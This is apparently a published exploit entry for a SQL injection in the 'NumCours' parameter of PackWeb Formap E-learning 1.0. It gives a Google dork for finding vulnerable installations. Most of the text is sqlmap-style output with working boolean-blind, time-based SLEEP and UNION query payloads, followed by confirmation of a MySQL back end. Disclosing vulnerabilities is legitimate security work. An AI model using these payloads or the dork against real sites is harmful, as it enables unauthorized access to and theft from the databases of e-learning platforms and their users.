Share
# Exploit Title: PackWeb Formap E-learning 1.0 - 'NumCours' SQL Injection  
# Google Dork: intitle: "PackWeb Formap E-learning"  
# Date: 2020-02-07  
# Exploit Author: Amel BOUZIANE-LEBLOND  
# Vendor Homepage: https://www.ediser.com/  
# Software Link: https://www.ediser.com/98517-formation-en-ligne  
# Version: v1.0  
# Tested on: Linux  
# CVE : N/A  
  
# Description:  
# The PackWeb Formap E-learning application from EDISER is vulnerable to  
# SQL injection via the 'NumCours' parameter on the eleve_cours.php  
  
==================== 1. SQLi ====================  
  
http://localhost/eleve_cours.php?NumCours=[SQLI]  
  
The 'NumCours' parameter is vulnerable to SQL injection.  
  
GET parameter 'NumCours' is vulnerable.  
  
---  
Parameter: #1* (URI)  
Type: boolean-based blind  
Title: OR boolean-based blind - WHERE or HAVING clause  
Payload: http://localhost/eleve_cours.php?NumCours=-9758' OR 6342=6342-- rSaq&static=1  
  
Type: time-based blind  
Title: MySQL >= 5.0.12 AND time-based blind (SLEEP)  
Payload: http://localhost/eleve_cours.php?NumCours=' AND SLEEP(5)-- rGcs&static=1  
  
Type: UNION query  
Title: MySQL UNION query (47) - 1 column  
Payload: http://localhost/eleve_cours.php?NumCours=' UNION ALL SELECT CONCAT(0x7176707171,0x58794e58714e52434d7879444262574a506d6f41526e636444674d5a6863667a6943517841654d54,0x717a7a6a71)#&static=1  
---  
[INFO] the back-end DBMS is MySQL  
back-end DBMS: MySQL >= 5.0.12